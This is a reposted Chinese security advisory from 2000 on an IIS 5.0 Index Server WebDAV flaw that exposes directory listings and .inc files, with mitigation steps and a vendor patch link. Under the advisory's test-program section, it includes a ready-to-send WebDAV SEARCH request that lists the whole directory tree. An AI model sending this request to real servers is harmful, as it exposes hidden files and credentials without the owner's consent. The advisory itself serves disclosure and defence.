在微軟IIS 5.0泄漏索引目錄的漏洞

來源:互聯網
上載者:User
iis|索引|微軟 微軟IIS 5.0泄漏索引目錄的漏洞

發布日期: 2000-10-6

更新日期: 2000-10-6
受影響的系統: Microsoft IIS 5.0
+ Microsoft Windows NT 2000


描述:
--------------------------------------------------------------------------------


如果IIS 5.0中的Index Server被允許的話,遠端使用者就可能察看整個根目錄結構以及所有子目錄,這是因為WebDAV的尋找實現中存在一個缺陷。隱藏目錄、包含檔案(*.inc)或其它在正常的網站介面中一般不能存取的文檔就會由於這個漏洞而泄漏。
成功地利用這個漏洞就可能找到那些可能包含敏感資訊如使用者名稱和密碼的特定檔案。
預設情況下IIS 5.0中的Index Server是被禁止的,只有設定了“Index”屬性的目錄才會受到這個漏洞的影響。

<* 來源:David Litchfield <dlitchfield@atstake.com> *>



測試程式:
--------------------------------------------------------------------------------

警 告

以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!


發送如下的請求給伺服器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>



--------------------------------------------------------------------------------
建議:
臨時解決辦法:

NSFOCUS建議您使用微軟提供的解決方案:
如果您沒有使用Index Server(比如您的網站中沒有需要尋找的內容),禁止或卸載該服務。或者將包含敏感資訊的目錄的“Index this resource”的選項禁止。

廠商補丁:

微軟發行一篇知識庫文章詳細描述了這個問題的解決方案,可以在如下的位置找到這篇文章:
http://www.microsoft.com/technet/support/kb.asp?ID=272079


中聯綠盟翻譯整理,未經許可,不得轉載
歡迎訪問我們的網站http://www.nsfocus.com/
中聯綠盟給您安全的保障



相關文章

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

Starter Package

SSD Cloud server and data transfer for only $2.50 a month

Get Started >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。